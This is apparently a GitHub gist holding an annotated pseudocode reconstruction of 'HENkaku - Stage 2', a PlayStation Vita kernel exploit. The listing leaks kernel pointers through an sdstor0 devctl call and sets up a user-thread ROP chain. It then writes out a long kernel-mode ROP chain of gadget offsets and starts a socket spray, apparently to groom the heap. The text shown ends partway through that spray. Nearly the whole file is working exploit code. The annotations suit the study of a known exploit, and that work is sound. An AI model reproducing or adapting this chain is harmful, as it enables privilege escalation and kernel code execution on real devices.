Last active
October 19, 2016 18:45
-
-
Save hexkyz/fcd4c0bdbd295102dd2cf18da2efda98 to your computer and use it in GitHub Desktop.
HENkaku - Stage 2
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Copy SD card device path and param | |
| strcpy(x_stack + 0x000086B4, "sdstor0:"); | |
| strcpy(x_stack + 0x000086CC, "xmc-lp-ign-userext"); | |
| // Clear devctl 0x05 outbuf | |
| // From x_stack + 0x00006F34 to x_stack + 0x00007334 | |
| memset(x_stack + 0x00006F34, 0x00000000, 0x00000400); | |
| // Copy dummy device path | |
| strcpy(x_stack + 0x000086E4, "molecule0:"); | |
| // Mount path? | |
| sceLibKernel_A4AD("molecule0:"); | |
| // Send command 0x05 to "sdstor0:" | |
| sceIoDevctl("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014, x_stack + 0x00006F34, 0x000003FF); | |
| // Store leaked kernel pointer 1 | |
| // Comes from devctl_outbuf + 0x3D4 | |
| 0x00(x_stack + 0x00008464) = 0x00(x_stack + 0x00007308) + 0xFFFFA8B9 | |
| // Create "pln" thread | |
| // "pln" == "pointer leak n"? | |
| // Entry (0x000054C8): LDMIA R1,{R1,R2,R4,R8,R11,SP,PC} | |
| int thread_id = sceKernelCreateThread("pln", 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000); | |
| // Store "pln" thread's ID | |
| 0x00(x_stack + 0x00008E94) = thread_id | |
| // Store SceKernelThreadInfo size | |
| 0x00(x_stack + 0x0000862C) = 0x7C | |
| // Get thread info structure | |
| sceKernelGetThreadInfo(thread_id, x_stack + 0x0000862C); | |
| // Save pln_threadinfo.stack + 0x00001000 | |
| 0x00(x_stack + 0x00008EA0) = 0x00(x_stack + 0x00008660) + 0x00001000 | |
| // Stack parameters for "pln" ROP chain | |
| 0x00(x_stack + 0x00008954) = 0x00000014 | |
| 0x00(x_stack + 0x00008958) = x_stack + 0x00006F34 | |
| 0x00(x_stack + 0x0000895C) = 0x000003FF | |
| // Stack parameters for "pln" ROP chain | |
| 0x00(x_stack + 0x0000896C) = 0x00000400 | |
| 0x00(x_stack + 0x00008970) = 0x00000000 | |
| 0x00(x_stack + 0x00008974) = 0x00000000 | |
| // Setup "pln" ROP chain | |
| 0x00(x_stack + 0x00008708) = 0x008DD9B5 | |
| 0x00(x_stack + 0x0000870C) = 0x000086E4 | |
| 0x00(x_stack + 0x00008710) = 0x00000000 | |
| 0x00(x_stack + 0x00008714) = 0x00000000 | |
| 0x00(x_stack + 0x00008718) = 0x00000000 | |
| 0x00(x_stack + 0x0000871C) = 0x0000A4AD | |
| 0x00(x_stack + 0x00008720) = 0x00000000 | |
| 0x00(x_stack + 0x00008724) = 0x000FCDBB | |
| 0x00(x_stack + 0x00008728) = 0x00000000 | |
| 0x00(x_stack + 0x0000872C) = 0x008DD9B5 | |
| 0x00(x_stack + 0x00008730) = 0x000086B4 | |
| 0x00(x_stack + 0x00008734) = 0x00000005 | |
| 0x00(x_stack + 0x00008738) = 0x000086CC | |
| 0x00(x_stack + 0x0000873C) = 0x00008954 | |
| 0x00(x_stack + 0x00008740) = 0x0000690C | |
| 0x00(x_stack + 0x00008744) = 0x00000000 | |
| 0x00(x_stack + 0x00008748) = 0x000FCDBB | |
| 0x00(x_stack + 0x0000874C) = 0x00000000 | |
| 0x00(x_stack + 0x00008750) = 0x008DD9B5 | |
| 0x00(x_stack + 0x00008754) = 0x000F4240 | |
| 0x00(x_stack + 0x00008758) = 0x00000000 | |
| 0x00(x_stack + 0x0000875C) = 0x00000000 | |
| 0x00(x_stack + 0x00008760) = 0x00000000 | |
| 0x00(x_stack + 0x00008764) = 0x00018544 | |
| 0x00(x_stack + 0x00008768) = 0x00000000 | |
| 0x00(x_stack + 0x0000876C) = 0x000FCDBB | |
| 0x00(x_stack + 0x00008770) = 0x00000000 | |
| 0x00(x_stack + 0x00008774) = 0x008DD9B5 | |
| 0x00(x_stack + 0x00008778) = 0x000086B4 | |
| 0x00(x_stack + 0x0000877C) = 0x00000005 | |
| 0x00(x_stack + 0x00008780) = 0x00007444 | |
| 0x00(x_stack + 0x00008784) = 0x0000896C | |
| 0x00(x_stack + 0x00008788) = 0x0000690C | |
| 0x00(x_stack + 0x0000878C) = 0x00000000 | |
| 0x00(x_stack + 0x00008790) = 0x000FCDBB | |
| 0x00(x_stack + 0x00008794) = 0x00000000 | |
| 0x00(x_stack + 0x00008798) = 0x00000519 | |
| /* | |
| "pln" ROP | |
| // Mount path? | |
| sceLibKernel_A4AD("molecule0:"); | |
| // Send devctl 0x05 | |
| sceIoDevctl_syscall("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014, x_stack + 0x00006F34, 0x000003FF); | |
| // Delay for a while | |
| sceKernelDelayThread(1000000); | |
| // Send devctl 0x05 again using | |
| // input buffer from x_stack + 0x00007444 to x_stack + 0x00007844 | |
| sceIoDevctl_syscall("sdstor0:", 0x00000005, x_stack + 0x00007444, 0x00000400, 0x00000000, 0x00000000); | |
| // Deadlock | |
| sceWebkit_519(); | |
| */ | |
| // Copy "pln" ROP chain into "pln" thread's stack | |
| memcpy(0x00(x_stack + 0x00008EA0), x_stack + 0x00008708, 0x00000100); | |
| // Set stack pointer | |
| 0x00(x_stack + 0x00008830) = x_stack + 0x00008EA0 | |
| // Set PC | |
| 0x00(x_stack + 0x00008834) = 0x000C048B // POP {PC} | |
| // Start "pln" thread | |
| // Thread arguments are loaded into R1 and the gadget | |
| // at the thread's entrypoint then loads register values | |
| // from it, overwritting SP and PC and triggering the | |
| // ROP chain | |
| sceKernelStartThread(thread_id, 0x0000001C, x_stack + 0x0000881C); | |
| // Delay for a while | |
| sceKernelDelayThread(100000); | |
| // Store leaked kernel pointer 2 | |
| // Comes from devctl_outbuf + 0x3C4 | |
| 0x00(x_stack + 0x00008458) = 0x00(x_stack + 0x000072F8) + 0xFFFFF544 | |
| // Setup pointer to leaked address in kernel module 1 | |
| 0x00(x_stack + 0x00007444) = 0x00(x_stack + 0x00008464) + 0x0001E460 | |
| // Setup pointer to leaked address in kernel module 2 | |
| 0x00(x_stack + 0x00008EAC) = 0x00(x_stack + 0x00008458) + 0x000006F8 + 0x00000300 | |
| // Setup kernel mode ROP chain | |
| 0x00(x_stack + 0x00008A8C) = 0x00(x_stack + 0x00008464) + 0x00000031 | |
| 0x00(x_stack + 0x00008A90) = 0x08106803 | |
| 0x00(x_stack + 0x00008A94) = 0x00(x_stack + 0x00008464) + 0x0001EFF1 | |
| 0x00(x_stack + 0x00008A98) = 0x00000038 | |
| 0x00(x_stack + 0x00008A9C) = 0x00(x_stack + 0x00008464) + 0x0001EFE1 | |
| 0x00(x_stack + 0x00008AA0) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008AA4) = 0x00(x_stack + 0x00008464) + 0x000039EB | |
| 0x00(x_stack + 0x00008AA8) = 0x00(x_stack + 0x00008464) + 0x0001B571 | |
| 0x00(x_stack + 0x00008AAC) = 0x00000000 | |
| 0x00(x_stack + 0x00008AB0) = 0x00(x_stack + 0x00008464) + 0x00001E43 | |
| 0x00(x_stack + 0x00008AB4) = 0x00000000 | |
| 0x00(x_stack + 0x00008AB8) = 0x00(x_stack + 0x00008464) + 0x0001FC6D | |
| 0x00(x_stack + 0x00008ABC) = 0x00(x_stack + 0x00008464) + 0x0000EA73 | |
| 0x00(x_stack + 0x00008AC0) = 0x00(x_stack + 0x00008464) + 0x00000031 | |
| 0x00(x_stack + 0x00008AC4) = 0x00(x_stack + 0x00008464) + 0x00027913 | |
| 0x00(x_stack + 0x00008AC8) = 0x00(x_stack + 0x00008464) + 0x0000A523 | |
| 0x00(x_stack + 0x00008ACC) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008AD0) = 0x00(x_stack + 0x00008464) + 0x00000CE3 | |
| 0x00(x_stack + 0x00008AD4) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008AD8) = 0x00(x_stack + 0x00008464) + 0x0001F2B1 | |
| 0x00(x_stack + 0x00008ADC) = 0x00(x_stack + 0x00008464) + 0x00000067 | |
| 0x00(x_stack + 0x00008AE0) = 0x00(x_stack + 0x00008464) + 0x0000587F | |
| 0x00(x_stack + 0x00008AE4) = 0x00(x_stack + 0x00008464) + 0x00019713 | |
| 0x00(x_stack + 0x00008AE8) = 0x00(x_stack + 0x00008464) + 0x00001605 | |
| 0x00(x_stack + 0x00008AEC) = 0x00(x_stack + 0x00008464) + 0x00001E1D | |
| 0x00(x_stack + 0x00008AF0) = 0x00000000 | |
| 0x00(x_stack + 0x00008AF4) = 0x00(x_stack + 0x00008464) + 0x0001EFE1 | |
| 0x00(x_stack + 0x00008AF8) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008AFC) = 0x00(x_stack + 0x00008464) + 0x00001603 | |
| 0x00(x_stack + 0x00008B00) = 0x00(x_stack + 0x00008464) + 0x0001F2B1 | |
| 0x00(x_stack + 0x00008B04) = 0x00(x_stack + 0x00008464) + 0x00001F17 | |
| 0x00(x_stack + 0x00008B08) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008B0C) = 0x00(x_stack + 0x00008464) + 0x00000031 | |
| 0x00(x_stack + 0x00008B10) = 0x00(x_stack + 0x00008464) + 0x0000B913 | |
| 0x00(x_stack + 0x00008B14) = 0x00(x_stack + 0x00008464) + 0x00023B61 | |
| 0x00(x_stack + 0x00008B18) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008B1C) = 0x00(x_stack + 0x00008464) + 0x000039EB | |
| 0x00(x_stack + 0x00008B20) = 0x00(x_stack + 0x00008464) + 0x000232EB | |
| 0x00(x_stack + 0x00008B24) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008B28) = 0x00(x_stack + 0x00008464) + 0x0001B571 | |
| 0x00(x_stack + 0x00008B2C) = 0x00(x_stack + 0x00008464) + 0x00023B61 | |
| 0x00(x_stack + 0x00008B30) = 0x00(x_stack + 0x00008464) + 0x000232F1 | |
| 0x00(x_stack + 0x00008B34) = 0x00(x_stack + 0x00008464) + 0x00001411 | |
| 0x00(x_stack + 0x00008B38) = 0x00(x_stack + 0x00008464) + 0x00000AE1 | |
| 0x00(x_stack + 0x00008B3C) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008B40) = 0x00(x_stack + 0x00008464) + 0x000050E9 | |
| 0x00(x_stack + 0x00008B44) = 0x00(x_stack + 0x00008464) + 0x00001411 | |
| 0x00(x_stack + 0x00008B48) = 0x00000010 | |
| 0x00(x_stack + 0x00008B4C) = 0x00(x_stack + 0x00008464) + 0x0001F2B1 | |
| 0x00(x_stack + 0x00008B50) = 0x00(x_stack + 0x00008464) + 0x00012B11 | |
| 0x00(x_stack + 0x00008B54) = 0x00(x_stack + 0x00008464) + 0x00000CE3 | |
| 0x00(x_stack + 0x00008B58) = 0x00(x_stack + 0x00008464) + 0x000000D1 | |
| 0x00(x_stack + 0x00008B5C) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008B60) = 0x00(x_stack + 0x00008464) + 0x0001F2B1 | |
| 0x00(x_stack + 0x00008B64) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008B68) = 0x00(x_stack + 0x00008464) + 0x000039EB | |
| 0x00(x_stack + 0x00008B6C) = 0x00(x_stack + 0x00008464) + 0x0001FDC5 | |
| 0x00(x_stack + 0x00008B70) = 0x00(x_stack + 0x00008464) + 0x0001D8DB | |
| 0x00(x_stack + 0x00008B74) = 0x00(x_stack + 0x00008464) + 0x00019399 | |
| 0x00(x_stack + 0x00008B78) = 0x00(x_stack + 0x00008464) + 0x00019399 | |
| 0x00(x_stack + 0x00008B7C) = 0x00(x_stack + 0x00008464) + 0x00011C5F | |
| 0x00(x_stack + 0x00008B80) = 0x00(x_stack + 0x00008464) + 0x00019399 | |
| 0x00(x_stack + 0x00008B84) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008B88) = 0x00(x_stack + 0x00008464) + 0x0000B913 | |
| 0x00(x_stack + 0x00008B8C) = 0x00000000 | |
| 0x00(x_stack + 0x00008B90) = 0x00(x_stack + 0x00008464) + 0x0001EFE1 | |
| 0x00(x_stack + 0x00008B94) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008B98) = 0x00(x_stack + 0x00008464) + 0x00001861 | |
| 0x00(x_stack + 0x00008B9C) = 0x00(x_stack + 0x00008464) + 0x0001FC6D | |
| 0x00(x_stack + 0x00008BA0) = 0x00(x_stack + 0x00008464) + 0x0001F2B1 | |
| 0x00(x_stack + 0x00008BA4) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008BA8) = 0x00(x_stack + 0x00008464) + 0x000039EB | |
| 0x00(x_stack + 0x00008BAC) = 0x00(x_stack + 0x00008464) + 0x00019399 | |
| 0x00(x_stack + 0x00008BB0) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008BB4) = 0x00(x_stack + 0x00008464) + 0x00019399 | |
| 0x00(x_stack + 0x00008BB8) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008BBC) = 0x00(x_stack + 0x00008464) + 0x000039EB | |
| 0x00(x_stack + 0x00008BC0) = 0x00(x_stack + 0x00008464) + 0x0001614D | |
| 0x00(x_stack + 0x00008BC4) = 0x00(x_stack + 0x00008464) + 0x000233D3 | |
| 0x00(x_stack + 0x00008BC8) = 0x00(x_stack + 0x00008464) + 0x0001F2B1 | |
| 0x00(x_stack + 0x00008BCC) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008BD0) = 0x00(x_stack + 0x00008464) + 0x000000AF | |
| 0x00(x_stack + 0x00008BD4) = 0x00(x_stack + 0x00008464) + 0x00001605 | |
| 0x00(x_stack + 0x00008BD8) = 0x00(x_stack + 0x00008464) + 0x0001EFE1 | |
| 0x00(x_stack + 0x00008BDC) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008BE0) = 0x00(x_stack + 0x00008464) + 0x000050E9 | |
| 0x00(x_stack + 0x00008BE4) = 0x00(x_stack + 0x00008464) + 0x000039EB | |
| 0x00(x_stack + 0x00008BE8) = 0x00(x_stack + 0x00008464) + 0x00001347 | |
| 0x00(x_stack + 0x00008BEC) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008BF0) = 0x00(x_stack + 0x00008464) + 0x000000B9 | |
| 0x00(x_stack + 0x00008BF4) = 0x00(x_stack + 0x00008464) + 0x0001F2B1 | |
| 0x00(x_stack + 0x00008BF8) = 0x00(x_stack + 0x00008464) + 0x00001347 | |
| 0x00(x_stack + 0x00008BFC) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008C00) = 0x00(x_stack + 0x00008464) + 0x0000039B | |
| 0x00(x_stack + 0x00008C04) = 0x00000000 | |
| 0x00(x_stack + 0x00008C08) = 0x00(x_stack + 0x00008464) + 0x0001CB95 | |
| 0x00(x_stack + 0x00008C0C) = 0x00(x_stack + 0x00008464) + 0x0001EA93 | |
| 0x00(x_stack + 0x00008C10) = 0x00(x_stack + 0x00008464) + 0x00001411 | |
| 0x00(x_stack + 0x00008C14) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008C18) = 0x00(x_stack + 0x00008464) + 0x000209D7 | |
| 0x00(x_stack + 0x00008C1C) = 0x00(x_stack + 0x00008464) + 0x000209D3 | |
| 0x00(x_stack + 0x00008C20) = 0x00(x_stack + 0x00008464) + 0x00001411 | |
| 0x00(x_stack + 0x00008C24) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008C28) = 0x00(x_stack + 0x00008464) + 0x0001BAF5 | |
| 0x00(x_stack + 0x00008C2C) = 0x00(x_stack + 0x00008464) + 0x00001605 | |
| 0x00(x_stack + 0x00008C30) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008C34) = 0x00(x_stack + 0x00008464) + 0x0000652B | |
| 0x00(x_stack + 0x00008C38) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008C3C) = 0x00(x_stack + 0x00008464) + 0x0001BAF5 | |
| 0x00(x_stack + 0x00008C40) = 0x00(x_stack + 0x00008464) + 0x00022A49 | |
| 0x00(x_stack + 0x00008C44) = 0xFFFFFEB0 | |
| 0x00(x_stack + 0x00008C48) = 0x00(x_stack + 0x00008464) + 0x0000039B | |
| 0x00(x_stack + 0x00008C5C) = 0x00000040 | |
| 0x00(x_stack + 0x00008C50) = 0x00(x_stack + 0x00008464) + 0x00022A49 | |
| 0x00(x_stack + 0x00008C54) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008C58) = 0x00(x_stack + 0x00008464) + 0x0000652B | |
| 0x00(x_stack + 0x00008C6C) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008C60) = 0x00(x_stack + 0x00008464) + 0x0000039B | |
| 0x00(x_stack + 0x00008C64) = 0x00000040 | |
| 0x00(x_stack + 0x00008C68) = 0x00(x_stack + 0x00008464) + 0x00001605 | |
| 0x00(x_stack + 0x00008C6C) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008C70) = 0x00(x_stack + 0x00008464) + 0x0001D9EB | |
| 0x00(x_stack + 0x00008C74) = 0x00(x_stack + 0x00008464) + 0x000039EB | |
| 0x00(x_stack + 0x00008C78) = 0x00(x_stack + 0x00008464) + 0x00000853 | |
| 0x00(x_stack + 0x00008C7C) = 0x00(x_stack + 0x00008464) + 0x0001D8DB | |
| 0x00(x_stack + 0x00008C80) = 0x00000038 | |
| 0x00(x_stack + 0x00008C84) = 0x00(x_stack + 0x00008464) + 0x000000AB | |
| 0x00(x_stack + 0x00008C88) = 0x00(x_stack + 0x00008464) + 0x000000D1 | |
| 0x00(x_stack + 0x00008C8C) = 0x00(x_stack + 0x00008464) + 0x0002328B | |
| 0x00(x_stack + 0x00008C90) = 0x00(x_stack + 0x00008464) + 0x00022FCD | |
| 0x00(x_stack + 0x00008C94) = 0x00(x_stack + 0x00008464) + 0x000000D1 | |
| 0x00(x_stack + 0x00008C98) = 0x00(x_stack + 0x00008464) + 0x0001EFF1 | |
| 0x00(x_stack + 0x00008C9C) = 0x00(x_stack + 0x00008464) + 0x0002A117 | |
| 0x00(x_stack + 0x00008CA0) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008CA4) = 0x00(x_stack + 0x00008464) + 0x00001605 | |
| 0x00(x_stack + 0x00008CA8) = 0x00(x_stack + 0x00008464) + 0x00019399 | |
| 0x00(x_stack + 0x00008CAC) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008CB0) = 0x00(x_stack + 0x00008464) + 0x000039EB | |
| 0x00(x_stack + 0x00008CB4) = 0x00(x_stack + 0x00008464) + 0x0001BF1F | |
| 0x00(x_stack + 0x00008CB8) = 0xFFFFFEB0 | |
| 0x00(x_stack + 0x00008CBC) = 0x00(x_stack + 0x00008464) + 0x0000039B | |
| 0x00(x_stack + 0x00008CC0) = 0x00000040 | |
| 0x00(x_stack + 0x00008CC4) = 0x00(x_stack + 0x00008464) + 0x00022A49 | |
| 0x00(x_stack + 0x00008CC8) = 0x00(x_stack + 0x00008464) + 0x000039EB | |
| 0x00(x_stack + 0x00008CCC) = 0x00(x_stack + 0x00008464) + 0x00003D73 | |
| 0x00(x_stack + 0x00008CD0) = 0x00000000 | |
| 0x00(x_stack + 0x00008CD4) = 0x00(x_stack + 0x00008464) + 0x000021FD | |
| 0x00(x_stack + 0x00008CD8) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008CDC) = 0x00(x_stack + 0x00008464) + 0x000050E9 | |
| 0x00(x_stack + 0x00008CE0) = 0x00(x_stack + 0x00008464) + 0x00000AE1 | |
| 0x00(x_stack + 0x00008CE4) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008CE8) = 0x00(x_stack + 0x00008464) + 0x0002A117 | |
| 0x00(x_stack + 0x00008CEC) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008CF0) = 0x00(x_stack + 0x00008464) + 0x0001F2B1 | |
| 0x00(x_stack + 0x00008CF4) = 0x00(x_stack + 0x00008464) + 0x00000067 | |
| 0x00(x_stack + 0x00008CF8) = 0x00(x_stack + 0x00008464) + 0x000039EB | |
| 0x00(x_stack + 0x00008CFC) = 0x00(x_stack + 0x00008464) + 0x0001BF47 | |
| 0x00(x_stack + 0x00008D00) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008D04) = 0x00(x_stack + 0x00008464) + 0x000050E9 | |
| 0x00(x_stack + 0x00008D08) = 0x00(x_stack + 0x00008464) + 0x0000AF33 | |
| 0x00(x_stack + 0x00008D0C) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008D10) = 0x00(x_stack + 0x00008464) + 0x0001D9EB | |
| 0x00(x_stack + 0x00008D14) = 0x00000000 | |
| 0x00(x_stack + 0x00008D18) = 0x00(x_stack + 0x00008464) + 0x0001FC6D | |
| 0x00(x_stack + 0x00008D1C) = 0x00(x_stack + 0x00008464) + 0x0000EA73 | |
| 0x00(x_stack + 0x00008D20) = 0x00(x_stack + 0x00008464) + 0x0000039B | |
| 0x00(x_stack + 0x00008D24) = 0x00(x_stack + 0x00008464) + 0x00000853 | |
| 0x00(x_stack + 0x00008D28) = 0xFFFFFFFF | |
| 0x00(x_stack + 0x00008D2C) = 0x08106803 | |
| 0x00(x_stack + 0x00008D30) = 0x00(x_stack + 0x00008464) + 0x000233D3 | |
| 0x00(x_stack + 0x00008D34) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008D38) = 0x00(x_stack + 0x00008464) + 0x00000433 | |
| 0x00(x_stack + 0x00008D3C) = 0x00(x_stack + 0x00008464) + 0x000233D3 | |
| 0x00(x_stack + 0x00008D40) = 0x00(x_stack + 0x00008464) + 0x000150A3 | |
| 0x00(x_stack + 0x00008D44) = 0x00000000 | |
| 0x00(x_stack + 0x00008D48) = 0x00(x_stack + 0x00008464) + 0x0000A74D | |
| 0x00(x_stack + 0x00008D4C) = 0x00(x_stack + 0x00008464) + 0x00000000 | |
| 0x00(x_stack + 0x00008D50) = 0x00(x_stack + 0x00008464) + 0x00000853 | |
| 0x00(x_stack + 0x00008D54) = 0x00(x_stack + 0x00008464) + 0x0001BF1F | |
| 0x00(x_stack + 0x00008D58) = 0x00000000 | |
| 0x00(x_stack + 0x00008D5C) = 0x00(x_stack + 0x00008464) + 0x00001605 | |
| 0x00(x_stack + 0x00008D60) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| 0x00(x_stack + 0x00008D64) = 0x00(x_stack + 0x00008464) + 0x000050E9 | |
| 0x00(x_stack + 0x00008D68) = 0x00(x_stack + 0x00008464) + 0x00001605 | |
| 0x00(x_stack + 0x00008D6C) = 0x00(x_stack + 0x00008464) + 0x00022FCD | |
| 0x00(x_stack + 0x00008D70) = 0x00(x_stack + 0x00008464) + 0x000039EB | |
| 0x00(x_stack + 0x00008D74) = 0x00(x_stack + 0x00008464) + 0x00000853 | |
| 0x00(x_stack + 0x00008D78) = 0x00(x_stack + 0x00008464) + 0x00011C5F | |
| // Overwrite specific NULLs in the ROP chain | |
| 0x00(x_stack + 0x00008C04) = 0x00(x_stack + 0x00008EAC) | |
| 0x00(x_stack + 0x00008B48) = 0x00000090 | |
| 0x00(x_stack + 0x00008CC0) = 0x00000240 | |
| 0x00(x_stack + 0x00008D58) = 0x00000200 | |
| 0x00(x_stack + 0x00008D14) = 0x00008FC0 | |
| // Copy kernel ROP chain | |
| memcpy(x_stack + 0x00007448, x_stack + 0x00008A8C, 0x300); | |
| // Copy the first 0x400 bytes of "obfuscated" data | |
| // and append them at the bottom of the ROP chain | |
| memcpy(x_stack + 0x00007744, x_stack + 0x00008EB8, 0x400); | |
| // Set kernel thread SP, PC, UNK | |
| 0x00(x_stack + 0x00008858) = 0x00(x_stack + 0x00008458) + 0x000006DC | |
| 0x00(x_stack + 0x0000884C) = 0x00(x_stack + 0x00008458) + 0x000006F8 + 0x00000004 | |
| 0x00(x_stack + 0x00008850) = 0x00(x_stack + 0x00008464) + 0x00000347 | |
| // Create "mhm" thread | |
| // "mhm" == "move heap memory"? | |
| // Entry (0x000054C8): LDMIA R1, {R1,R2,R4,R8,R11,SP,PC} | |
| int thread_id = sceKernelCreateThread("mhm", 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000); | |
| // Store "mhm" thread's ID | |
| 0x00(x_stack + 0x00008620) = thread_id | |
| // Store SceKernelThreadInfo size | |
| 0x00(x_stack + 0x0000862C) = 0x0000007C | |
| // Get "mhm" thread's info structure | |
| sceKernelGetThreadInfo(thread_id, x_stack + 0x0000862C); | |
| // Store mhm_threadinfo.stack + 0x00001000 | |
| 0x00(x_stack + 0x000086FC) = 0x00(x_stack + 0x00008660) + 0x00001000 | |
| // Spam sceNetSocket requests | |
| // sceNetSocket("x", AF_INET, SOCK_STREAM, 0); | |
| 0x00(x_stack + 0x00008470) = sceNetSocket(x_stack + 0x00010388, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008474) = sceNetSocket(x_stack + 0x00010390, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008478) = sceNetSocket(x_stack + 0x00010398, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x0000847C) = sceNetSocket(x_stack + 0x000103A0, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008480) = sceNetSocket(x_stack + 0x000103A8, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008484) = sceNetSocket(x_stack + 0x000103B0, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008488) = sceNetSocket(x_stack + 0x000103B8, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x0000848C) = sceNetSocket(x_stack + 0x000103C0, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008490) = sceNetSocket(x_stack + 0x000103C8, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008494) = sceNetSocket(x_stack + 0x000103D0, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008498) = sceNetSocket(x_stack + 0x000103D8, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x0000849C) = sceNetSocket(x_stack + 0x000103E0, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084A0) = sceNetSocket(x_stack + 0x000103E8, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084A4) = sceNetSocket(x_stack + 0x000103F0, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084A8) = sceNetSocket(x_stack + 0x000103F8, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084AC) = sceNetSocket(x_stack + 0x00010400, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084B0) = sceNetSocket(x_stack + 0x00010408, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084B4) = sceNetSocket(x_stack + 0x00010410, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084B8) = sceNetSocket(x_stack + 0x00010418, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084BC) = sceNetSocket(x_stack + 0x00010420, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084C0) = sceNetSocket(x_stack + 0x00010428, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084C4) = sceNetSocket(x_stack + 0x00010430, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084C8) = sceNetSocket(x_stack + 0x00010438, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084CC) = sceNetSocket(x_stack + 0x00010440, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084D0) = sceNetSocket(x_stack + 0x00010448, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084D4) = sceNetSocket(x_stack + 0x00010450, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084D8) = sceNetSocket(x_stack + 0x00010458, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084DC) = sceNetSocket(x_stack + 0x00010460, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084E0) = sceNetSocket(x_stack + 0x00010468, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084E4) = sceNetSocket(x_stack + 0x00010470, 0x00000002, 0x00000001, 0x00000000); | |
